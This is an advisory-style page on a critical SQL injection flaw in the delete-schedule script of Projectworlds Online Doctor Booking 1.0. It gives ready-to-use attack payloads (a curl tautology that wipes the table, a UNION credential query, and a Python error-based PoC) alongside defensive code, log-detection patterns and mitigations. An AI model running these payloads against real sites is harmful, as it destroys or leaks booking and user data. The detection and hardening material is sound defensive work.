How the CVE Works
The vulnerability is in `/doctor/deleteschedule.php`: the `ID` request parameter is placed into a SQL statement without validation or escaping, so whatever the client sends is parsed as part of the query. A crafted value therefore makes the backend database run attacker-chosen SQL, which can expose, modify or delete data; because this script exists to delete schedule entries, a tautology such as `OR 1=1` appended to the parameter can remove every row in one request. The flaw is remotely exploitable without authentication, which is why it is rated critical. The root cause is simply the missing input validation in the PHP script, not any bypass of a security check that the script performs.
DailyCVE Form
Platform: Projectworlds Online Doctor Booking
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/08/2025
What Undercode Say:
Exploitation (MySQL only treats `--` as a comment when whitespace follows it, so the comment is written `-- -`; on a DELETE statement this tautology removes every row, so run it only against a copy you own):
curl -X POST "http://target.com/doctor/deleteschedule.php" -d "ID=1' OR 1=1-- -"
SQL Payload (UNION-based; assumes a `users` table with those columns and an injection point inside a SELECT whose output is rendered, and the number of UNION columns must match the original query):
1' UNION SELECT username, password FROM users-- -
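To show what the two payloads above actually do to the database, here is an added example (not code from this page or from the Projectworlds project) that models the flawed handler and a hardened one with Python's built-in sqlite3. The table name `schedule`, its columns and the assumption that the script splices `ID` into a quoted `DELETE ... WHERE ID = '...'` are all assumptions, because the real query text is not published; the sample rows are constructed. It goes slightly beyond the page by including the fix: type validation plus a bound parameter, which rejects the tautology that wipes the table in the vulnerable version.

```python
import sqlite3

# Added example, not the project's code. Table and column names are assumptions:
# the advisory names only the script and the ID parameter, not the schema.
SEED_ROWS = [(1, "dr_a", "09:00"), (2, "dr_b", "10:00"), (3, "dr_a", "11:00")]


def fresh_db():
    """Constructed in-memory stand-in for the booking database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE schedule (ID INTEGER PRIMARY KEY, doctor TEXT, slot TEXT)")
    conn.executemany("INSERT INTO schedule VALUES (?, ?, ?)", SEED_ROWS)
    conn.commit()
    return conn


def rows_left(conn):
    return conn.execute("SELECT COUNT(*) FROM schedule").fetchone()[0]


def delete_schedule_vulnerable(conn, user_id):
    """Models the flaw: the request parameter is spliced into the SQL text.
    Assumes the script quotes the value; an unquoted numeric context would be
    hit the same way with the payload 1 OR 1=1.
    """
    sql = f"DELETE FROM schedule WHERE ID = '{user_id}'"
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount  # rows actually deleted


def delete_schedule_safe(conn, user_id):
    """Hardened form: reject anything that is not an integer, then bind the
    value as a parameter so it can never be parsed as SQL."""
    try:
        id_int = int(str(user_id).strip())
    except ValueError:
        return 0  # treat as a bad request; nothing is deleted
    cur = conn.execute("DELETE FROM schedule WHERE ID = ?", (id_int,))
    conn.commit()
    return cur.rowcount


# The tautology from the curl command above; MySQL's `-- -` comment form
# is accepted by SQLite as well.
TAUTOLOGY = "1' OR 1=1-- -"


def demo():
    results = {}
    conn = fresh_db()
    results["vulnerable_legit"] = delete_schedule_vulnerable(conn, "1")         # 1 row
    conn = fresh_db()
    results["vulnerable_payload"] = delete_schedule_vulnerable(conn, TAUTOLOGY)  # 3 rows: whole table
    conn = fresh_db()
    results["safe_payload"] = delete_schedule_safe(conn, TAUTOLOGY)             # 0 rows
    results["safe_payload_left"] = rows_left(conn)                               # 3
    conn = fresh_db()
    results["safe_legit"] = delete_schedule_safe(conn, "2")                      # 1 row
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The hardened handler does two independent things: it refuses any value that is not an integer, and it binds the value instead of concatenating it. Either one alone stops this payload; doing both means a future change to the column type does not silently reopen the hole.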
Detection (Log Analysis; in access.log a quote normally appears percent-encoded as %27, and POST bodies are not logged at all, so payloads sent with -d need mod_security audit logging or application-level logging to show up):
grep -iE "deleteschedule\.php\?ID=[^ ]*(%27|'|--|%20)" /var/log/apache2/access.log
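The grep above only catches payloads that travel in the query string and only in the encoded form it happens to match. As an added example (not from the original page), here is a Python scanner over constructed combined-format access.log lines that URL-decodes the `ID` parameter and flags every request where it is not a plain integer, then marks which of those contain recognisable SQL fragments. The IPs, timestamps and user agents in the sample are made up. The last sample line is a POST with no query string and produces no hit, which is exactly the blind spot of access.log for this vulnerability.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed combined-format access.log lines for illustration; the IPs,
# timestamps and user agents are made up, not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Apr/2025:10:01:02 +0000] "GET /doctor/deleteschedule.php?ID=7 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [08/Apr/2025:10:02:15 +0000] "GET /doctor/deleteschedule.php?ID=1%27%20OR%201%3D1--%20- HTTP/1.1" 200 498 "-" "curl/8.5.0"
203.0.113.9 - - [08/Apr/2025:10:03:40 +0000] "GET /doctor/deleteschedule.php?ID=1%27%20UNION%20SELECT%20username%2Cpassword%20FROM%20users--%20- HTTP/1.1" 500 211 "-" "python-requests/2.32.0"
203.0.113.5 - - [08/Apr/2025:10:04:01 +0000] "POST /doctor/deleteschedule.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Request line of the combined log format: ip ident user [ts] "METHOD target proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Fragments that have no business in a numeric ID; matched after URL decoding.
SQLI_RE = re.compile(
    r"(['\"]|--|#|/\*|\b(?:or|and)\b\s+\S+\s*=|\bunion\b|\bselect\b|\bsleep\s*\(|\bbenchmark\s*\()",
    re.IGNORECASE,
)

TARGET_PATH = "/doctor/deleteschedule.php"


def scan_access_log(text):
    """Return one record per request whose decoded ID parameter is not a plain integer."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m["target"])
        if not url.path.endswith(TARGET_PATH):
            continue
        # parse_qs splits on the raw '&' and '=' first and percent-decodes
        # afterwards, so %27 becomes ' and %3D becomes = inside the value.
        for value in parse_qs(url.query).get("ID", []):
            if value.isdigit():
                continue
            hits.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "status": m["status"],
                "id": value,
                "sqli": bool(SQLI_RE.search(value)),
            })
    return hits


if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG):
        print(f'{h["ts"]} {h["ip"]} status={h["status"]} sqli={h["sqli"]} ID={h["id"]!r}')
```

Flagging on "not an integer" first and classifying second keeps the rule robust against encodings the signature list does not know about; the `status` field is worth keeping because error-based payloads like the PoC below tend to produce 500s.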
Mitigation:
1. Patch: Apply vendor updates.
2. Input Sanitization (escaping only helps if the query quotes the value; for a numeric ID, cast it to int or bind it with mysqli prepare()/bind_param() instead):
$id = mysqli_real_escape_string($conn, $_POST['ID']); // only safe when used as WHERE ID = '$id'; prefer (int) $_POST['ID'] or a prepared statement
3. Emergency Block (nginx; this is not a WAF rule but a full block of the endpoint until the patch is applied, so the delete-schedule feature stops working. A real WAF rule would inspect the ID parameter and drop values that are not integers):
location ~ deleteschedule\.php$ { deny all; }
4. Database Hardening (least privilege; `appointments` and `webuser` are placeholders for the real table and application account. Revoking DELETE also breaks the legitimate delete function of this script, so revoke only what the application does not need: access to other databases, FILE, SUPER and similar):
REVOKE DELETE ON appointments FROM 'webuser'@'%';
Exploit PoC (Python; the `*` in COUNT(*) and RAND(0)*2 had been lost in formatting and is restored here, and the trailing comment is written `-- -` so MySQL accepts it):
import requests

url = "http://victim.com/doctor/deleteschedule.php"
# Error-based payload: the duplicate-key trick makes MySQL raise an error whose text contains user()
payload = {"ID": "1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(user(),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -"}
r = requests.post(url, data=payload)
print(r.text)  # only leaks anything if the script echoes database errors to the client
Post-Exploit Analysis (only works if the general log is on and written to a table: general_log=ON and log_output=TABLE; it is off by default. The `argument` column holds the SQL text, not the URL, so match the injected fragments rather than the script name):
SELECT * FROM mysql.general_log WHERE argument LIKE '%OR 1=1%' OR argument LIKE '%INFORMATION_SCHEMA.PLUGINS%';
Backup and Restoration (If Compromised; dump the current state first so the tampered data is preserved as evidence, then restore a backup taken before the compromise):
mysqldump -u root -p --all-databases > compromised_state.sql
mysql -u root -p < known_good_backup.sql
End.
References:
NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2025-3180
Extra Source Hub:
Undercode